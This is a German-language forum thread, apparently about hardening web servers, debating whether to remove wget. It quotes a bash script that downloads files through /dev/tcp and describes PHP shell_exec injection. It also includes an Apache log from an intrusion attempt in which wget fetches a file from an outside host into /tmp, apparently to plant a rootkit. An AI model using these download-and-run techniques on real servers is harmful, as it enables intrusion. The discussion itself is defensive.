Na, GsD ist es ja auch auf sonst so gut wie keinem System draufIch bin eher der Meinung man sollte wget auf einem Webserver nach dessen Einrichtung deinstallieren.
Dann werden aber Updates sowie Installationen von Zusatzprogrammen erheblich verkompliziert. Wenn jemand Shell-Zugriff hat kann er viel mehr als ein schnoedes wget benutzen.Ich bin eher der Meinung man sollte wget auf einem Webserver nach dessen Einrichtung deinstallieren.
Dann werden aber Updates sowie Installationen von Zusatzprogrammen erheblich verkompliziert. Wenn jemand Shell-Zugriff hat kann er viel mehr als ein schnoedes wget benutzen.
#!/bin/bash
if [ $# = 0 ]; then
echo "Usage: http-get <URL>" >&2
exit 1
fi
URL=${1##http://} &&
SERVER=${URL%%/*} &&
FULLFILENAME=${URL#$SERVER} &&
FILENAME=${FULLFILENAME##*/}
echo -n "Fetching $SERVER$FULLFILENAME... "
(echo -e "GET $FULLFILENAME HTTP/1.0\r\n\r\n" 1>&3 &
cat 0<&3) 3<>/dev/tcp/$SERVER/80 | (
read i
while [ x"$(echo $i | tr -d '\r')" != "x" ]
do
read i
done
cat
) >$FILENAME
echo "done."
exit 0
Du gehst hier davon aus dass der Angreifer einen Angriff auf ein Sicherheitsloch in einem PHP-Skript ausfuehrt, Quellcode hochladen kann und shell_exec erlaubt ist. Und dann soll der Angreifer wget benutzen wenn er in PHP selbst die Funktionen fopen() und fsockopen() hat?Wenn das Script dann kein wget findet, schaut kein Scriptkind nach, woran es denn gelegen hat, sondern ist mit den anderen 99 Treffern zufrieden.
Du denkst zu kompliziert Eine schnöde ungefilterte Input-Variable genügt leider oft schon um einen wget/whatever-Aufruf ausführen zu lassen. Und shell_exec und Konsorten hat doch in freier Wildbahn kaum jemand deaktiviert.Du gehst hier davon aus dass der Angreifer einen Angriff auf ein Sicherheitsloch in einem PHP-Skript ausfuehrt, Quellcode hochladen kann und shell_exec erlaubt ist. Und dann soll der Angreifer wget benutzen wenn er in PHP selbst die Funktionen fopen() und fsockopen() hat?
...
[Fri Jan 28 18:17:44 2011] [error] [client 216.245.222.67] File does not exist: /srv/www/web52/html/admin
sh: fetch: command not found
--18:17:48-- http://hbbb.com.au/.../css.log
=> `/tmp/css.log'
Resolving hbbb.com.au... 184.106.137.176
Connecting to hbbb.com.au|184.106.137.176|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,302 (27K) [text/plain]
0K .......... .......... ...... 100% 120.89 KB/s
18:17:48 (120.89 KB/s) - `/tmp/css.log' saved [27302/27302]
...
Die css.log liegt auch in temp, anscheinend war aber erstmal nix weiter damit anzufangen. Der Versuch also einen rootkit einzuschleussen.
Das geht auch ohne Netfilter.Alternativ funktioniert auch "iptables -I INPUT --dport 80 -j DROP" um den Webserver ab zu sichern.
We use essential cookies to make this site work, and optional cookies to enhance your experience.